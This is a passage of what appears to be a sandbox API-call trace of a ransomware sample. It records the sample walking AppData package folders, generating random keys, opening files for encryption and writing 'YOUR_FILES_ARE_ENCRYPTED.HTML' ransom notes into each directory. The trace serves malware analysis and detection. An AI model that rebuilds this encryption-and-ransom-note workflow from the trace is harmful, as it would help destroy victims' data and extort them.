lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0114.449] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x548ea798, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3160b30, dwReserved1=0x6f15b0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0114.450] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x548ea798, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3160b30, dwReserved1=0x6f15b0, cFileName="..", cAlternateFileName="")) returned 1 [0114.451] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x548ea798, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x54936dab, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x54936dab, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x3160b30, dwReserved1=0x6f15b0, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0114.451] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.451] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 197 [0114.451] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0114.451] lstrlenW (lpString=".dat") returned 4 [0114.451] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0114.451] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\microsoft.aad.brokerplugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0114.451] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0114.451] GetProcessHeap () returned 0x600000 [0114.451] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0114.453] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="2F") returned 2 [0114.453] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="FB") returned 2 [0114.453] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="BC") returned 2 [0114.453] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="85") returned 2 [0114.453] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="27") returned 2 [0114.453] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="AA") returned 2 [0114.453] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="EB") returned 2 [0114.453] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="06") returned 2 [0114.453] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="77") returned 2 [0114.453] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="B7") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="91") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="80") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="41") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="28") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="72") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="4A") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="F2") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="FE") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="09") returned 2 [0114.454] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="8B") returned 2 [0114.454] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="45") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="39") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="7B") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="EA") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="B0") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="07") returned 2 [0114.454] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="7D") returned 2 [0114.454] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="77") returned 2 [0114.454] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="E1") returned 2 [0114.454] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="DB") returned 2 [0114.454] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="00") returned 2 [0114.454] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="57") returned 2 [0114.454] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0114.454] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.455] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0114.455] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x548ea798, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x3160b30, dwReserved1=0x6f15b0, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0114.455] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.455] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 202 [0114.455] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0114.455] lstrlenW (lpString=".LOG1") returned 5 [0114.455] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0114.455] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x548ea798, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3160b30, dwReserved1=0x6f15b0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0114.455] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.455] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 202 [0114.455] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0114.455] lstrlenW (lpString=".LOG2") returned 5 [0114.455] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0114.455] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x548ea798, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3160b30, dwReserved1=0x6f15b0, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0114.455] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0114.455] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 207 [0114.455] GetProcessHeap () returned 0x600000 [0114.455] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\microsoft.aad.brokerplugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.456] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.457] CloseHandle (hObject=0x32c) returned 1 [0114.459] GetProcessHeap () returned 0x600000 [0114.459] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.459] GetProcessHeap () returned 0x600000 [0114.459] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.459] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x548ea798, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0114.460] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.460] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 191 [0114.460] GetProcessHeap () returned 0x600000 [0114.460] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Microsoft.AAD.BrokerPlugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\microsoft.aad.brokerplugin_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.464] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.465] CloseHandle (hObject=0x324) returned 1 [0114.465] GetProcessHeap () returned 0x600000 [0114.465] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.465] GetProcessHeap () returned 0x600000 [0114.465] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.465] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54746ebf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x54746ebf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x54746ebf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0114.465] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.465] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\RoamingState") returned 102 [0114.465] GetProcessHeap () returned 0x600000 [0114.465] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.465] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\RoamingState" [0114.465] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\RoamingState\\*" [0114.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54746ebf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x54746ebf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x54746ebf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.465] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54746ebf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x54746ebf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x54746ebf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 1 [0114.465] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54746ebf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x54746ebf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x54746ebf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 0 [0114.465] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.465] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0114.465] GetProcessHeap () returned 0x600000 [0114.465] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.466] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.467] CloseHandle (hObject=0x324) returned 1 [0114.467] GetProcessHeap () returned 0x600000 [0114.467] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.467] GetProcessHeap () returned 0x600000 [0114.467] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.468] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547933c2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0114.468] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.468] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings") returned 98 [0114.468] GetProcessHeap () returned 0x600000 [0114.468] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.470] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings" [0114.470] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\*" [0114.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x903edf7e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.471] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5476d1ac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x903edf7e, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 1 [0114.471] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x547933c2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547933c2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547933c2, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0114.471] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.471] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\Settings\\roaming.lock") returned 111 [0114.471] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0114.471] lstrlenW (lpString=".lock") returned 5 [0114.471] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0114.471] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x547933c2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x9056b602, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9056b602, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0114.471] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.472] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: 